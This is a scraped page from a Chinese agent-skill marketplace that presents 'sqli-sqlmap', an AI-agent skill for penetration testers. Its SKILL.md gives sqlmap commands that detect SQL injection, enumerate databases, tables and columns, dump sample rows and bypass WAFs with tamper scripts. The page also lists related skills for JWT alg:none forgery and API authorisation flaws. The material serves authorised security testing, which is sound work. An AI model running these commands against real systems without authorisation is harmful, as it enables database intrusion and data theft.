在 Manus 中运行任何 Skill
一键导入
一键导入
一键在 Manus 中运行任何 Skill
开始使用sqli-sqlmap
星标2
分支0
更新时间2026年6月3日 04:04
使用 sqlmap 检测和利用 SQL 注入漏洞,包括数据库枚举、数据提取和 WAF 绕过。
安装
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
SKILL.md
readonly菜单
使用 sqlmap 检测和利用 SQL 注入漏洞,包括数据库枚举、数据提取和 WAF 绕过。
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
通过被动来源和受控主动 DNS 枚举目标子域名,发现更多授权攻击面入口。
使用 agent-browser 在授权范围内执行浏览器交互验证,并在需要视觉判断时调用 pents vision-review 生成结构化视觉复核结果。
检测 API 中的功能级授权破坏(BFLA),验证普通用户是否能通过直接调用管理端点或操纵 HTTP 方法来执行管理员功能。
检测 API 中的对象级授权缺陷(BOLA/IDOR),通过篡改对象标识符越权访问或修改其他用户的数据。
利用 JWT 库接受 alg:none 的漏洞绕过签名验证,伪造任意 Token 实现权限提升。
检测 API 中的批量赋值漏洞,通过在请求体中添加非预期字段修改不应被客户端控制的属性。
| name | sqli-sqlmap |
| description | 使用 sqlmap 检测和利用 SQL 注入漏洞,包括数据库枚举、数据提取和 WAF 绕过。 |
| category | web |
| source | xalgorix |
| tags | ["SQL 注入","sqlmap","数据库","WAF 绕过"] |
| required_tools | ["sqlmap","curl"] |
--risk=1 --level=1,仅在主代理确认 scope 允许更高风险时提升。sqlmap,版本 ≥ 1.7。# 从 Burp/ZAP 或手动测试获取疑似注入 URL
# 典型可疑参数:id=, user=, page=, search=, category=
记录注入点 URL 和方法(GET/POST)到 inventory。
# 对单个参数进行基础检测
sqlmap -u "https://<target>/page?id=1" \
--batch \
--random-agent \
--output-dir=./sqlmap_output \
--level=1 --risk=1
--batch 使用默认选项,--random-agent 避免使用 sqlmap 默认 UA。
# 如步骤 2 确认注入,枚举数据库名
sqlmap -u "https://<target>/page?id=1" \
--batch --random-agent --output-dir=./sqlmap_output \
--dbs
# 枚举指定数据库的表
sqlmap -u "https://<target>/page?id=1" \
--batch --random-agent --output-dir=./sqlmap_output \
-D <database_name> --tables
# 枚举指定表的列
sqlmap -u "https://<target>/page?id=1" \
--batch --random-agent --output-dir=./sqlmap_output \
-D <database_name> -T <table_name> --columns
# 仅提取前 3 行验证,不导出全表
sqlmap -u "https://<target>/page?id=1" \
--batch --random-agent --output-dir=./sqlmap_output \
-D <database_name> -T <table_name> --dump --stop=3
# 使用 tamper 脚本绕过常见 WAF
sqlmap -u "https://<target>/page?id=1" \
--batch --random-agent --output-dir=./sqlmap_output \
--tamper=between,space2comment,charencode \
--level=3 --risk=2
常用 tamper 组合:
between,space2comment:对付基础过滤charencode,randomcase:对付关键字过滤charunicodeencode,percentage:对付强 WAF# 清理 sqlmap 缓存
sqlmap --purge
# 删除输出目录(如有敏感数据)
rm -rf ./sqlmap_output
--risk=3 可能尝试 OR 1=1 等危险语句,未经主代理确认不得使用。--level=1 --risk=1 完成基础检测。sqlmap --purge 清理。